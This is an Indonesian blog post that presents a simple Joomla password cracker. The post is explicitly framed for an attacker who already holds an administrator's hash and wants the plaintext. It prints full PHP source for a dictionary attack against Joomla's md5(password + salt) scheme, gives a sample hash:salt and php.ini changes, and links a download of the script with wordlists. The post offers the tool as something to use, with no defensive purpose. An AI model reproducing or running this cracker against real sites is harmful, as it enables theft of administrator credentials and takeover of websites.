Konsep Sederhana Joomla Password Cracker
Betapa mudahnya seorang attacker mendapatkan username dan password sang administrator
pada content management system seperti joomla, tapi masih terdapat satu masalah,
dimana seorang attacker masih belum dapat melakukan eksploitasi lebih lanjut,
dikarenakan password yang didapatkan itu masih dalam bentuk password yang terenkripsi,
sehingga butuh perlakuan khusus lebih lanjut untuk mendapatkan password yang sesungguhnya.
Perlakuan yang bisa dilakukan salah satunya yaitu pada satu jenis hash saja, yaitu joomla hash password.
Penjelasan yang akan penulis lakukan bukanlah mencoba membuat algoritma dekripsi password tetapi
hanyalah penggunaan metode dictionary file, dimana untuk mendapatkan password asli cukup dilakukan
pencocokan password dengan kamus data yang ada sehingga menghasilkan password yang sebenarnya.
Kekurangannya adalah resource memori yang di butuhkan untuk metode seperti ini cenderung lebih besar
dari ukuran biasanya.
Berikut adalah source code lengkap 'simple joomla password cracker' :
-----------------------// cut here
| Simple
|
$hashes=array();
$i=0;
$parts=explode(":",$_POST['hash']);
$hashes[$i][0]=$parts[0];
$hashes[$i][1]=$parts[1];
if (ISSET($_POST['hash']))
{
$str = " ";
echo "Started: ";
echo date("F j, Y, g:i:s a");
$lines = file('kamus2.txt');
foreach ($lines as $line_num => $line)
{
check($line);
}
$lines = file('kamus1.txt');
foreach ($lines as $line_num => $line)
{
check($line);
}
echo "
Finished : ";
echo date("F j, Y, g:i:s a");
}
function check($a)
{
global $i;
$a=rtrim($a) ;
for($x=0;$x<=$i;$x++)
{
global $hashes;
if (md5($a.$hashes[$x][1]) === $hashes[$x][0])
{
echo "
The password is :
$a
";echo "Ended: ";
echo date("F j, Y, g:i:s a");
}
}
}
?>
Tolong di kembangkan ya ?! :D
-----------------------// cut here
1. Untuk menjalankan script ini di localhost anda perlu merubah konfigurasi php.ini, yaitu dengan mengganti baris ini :
memory_limit = 32M ;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; Resource Limits ;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
max_execution_time = 60
max_input_time = 60
memory_limit = 256M
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; Error handling and logging ;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
menjadi > 32, penulis menggantinya menjadi :
memory_limit = 256M ;
2. enkripsi password joomla biasanya terdiri dari hash dan salt.
Standar enkripsi joomla biasanya berbentuk seperti ini :
b51498faae03f7cf533e3ed97fc00116:9VrQpQzdNQHhtieK
Hashnya itu terdapat pada bagian yang pertama yaitu b51498faae03f7cf533e3ed97fc00116,
dan saltnya itu ada di bagian akhir 9VrQpQzdNQHhtieK, keduanya terlihat di pisahkan dengan
titik dua ":". Salt bagi seorang attacker berfungsi untuk membantu dalam pencarian password sesungguhnya.
Yang ditemukan disini adalah jika password berbentuk plain text di gabung dengan saltnya maka akan
menghasilkan hash password joomla. Dengan kata lain jika : x + salt = hash joomla.
Sehingga jika di implementasikan melalui enkripsi md5 :
md5(x + salt) = hash
maka :
md5(x + 9VrQpQzdNQHhtieK) = b51498faae03f7cf533e3ed97fc00116
berapakah x ? ( pak Mamat guru matematika di SMAN 4 Bogor kayanya tau. :D huehuehuehehe... )
Ya seperti pada baris kalimat ini :
...
if (md5($a.$hashes[$x][1]) === $hashes[$x][0])
{
echo "
The password is :
$a
";...
Dan hasilnya adalah ..
(script lengkap dan kamus passwordnya dapat anda download di http://www.unair.info/ilmuwebsite/hack/jomla2/brute.zip
Rujukan:
http://www.ilmuwebsite.com/
0 komentar:
Post a Comment